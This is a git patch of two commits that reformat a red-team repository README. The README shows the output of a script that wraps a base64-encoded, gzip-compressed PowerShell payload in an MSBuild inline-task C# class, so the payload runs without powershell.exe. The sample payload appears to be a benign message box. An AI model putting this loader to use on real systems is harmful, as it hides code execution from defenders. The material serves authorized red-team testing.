From 3d3e6ec8dc43e0b8c3d19bce0b82d7673bff364f Mon Sep 17 00:00:00 2001 From: Mariusz Date: Mon, 12 Feb 2018 09:48:00 +0100 Subject: [PATCH 1/2] Update README.md --- social-engineering/README.md | 20 ++++---------------- 1 file changed, 4 insertions(+), 16 deletions(-) diff --git a/social-engineering/README.md b/social-engineering/README.md index 80888e8..0865c5b 100644 --- a/social-engineering/README.md +++ b/social-engineering/README.md @@ -26,7 +26,7 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 :: Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' + To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' Mariusz B. / mgeeky, [?] File not recognized as PE/EXE. @@ -42,7 +42,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py S + AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > @@ -55,7 +55,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py S public class hwiJYmWvD : Task { public override bool Execute() { - byte[] payload = System.Convert.FromBase64String("JHMgPSBOZXctT2JqZ WN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygn SDRzSUFJOUxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW0 1U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZV czNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0T Xo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3 LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5 HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb 2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs="); + byte[] payload = System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygn SDRzSUFJOUxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW0 1U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZV czNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0T Xo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3 LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb 2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs="); string decoded = System.Text.Encoding.UTF8.GetString(payload); Runspace runspace = RunspaceFactory.CreateRunspace(); @@ -89,19 +89,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py S [?] File not recognized as PE/EXE. ------------------------------------------------------------------------------------ - -< -Code Type="Class" Language="cs"> + ------------------------------------------------------------------------------------ ``` From 27abf67b3f51f1db5feaf579e3b39e826eba8657 Mon Sep 17 00:00:00 2001 From: Mariusz Date: Mon, 12 Feb 2018 09:49:14 +0100 Subject: [PATCH 2/2] Update README.md --- social-engineering/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/social-engineering/README.md b/social-engineering/README.md index 0865c5b..2b33916 100644 --- a/social-engineering/README.md +++ b/social-engineering/README.md @@ -55,7 +55,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py S public class hwiJYmWvD : Task { public override bool Execute() { - byte[] payload = System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygn SDRzSUFJOUxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW0 1U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZV czNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0T Xo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3 LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb 2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs="); + byte[] payload = System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSDRzSUFJOUxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW01U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZVczNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0TXo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs="); string decoded = System.Text.Encoding.UTF8.GetString(payload); Runspace runspace = RunspaceFactory.CreateRunspace(); @@ -80,10 +80,10 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py S **minimized** ``` -C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 -m +C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 -m - :: Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' + :: Powershell via MSBuild inline-task XML payload generation script + To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' Mariusz B. / mgeeky, [?] File not recognized as PE/EXE.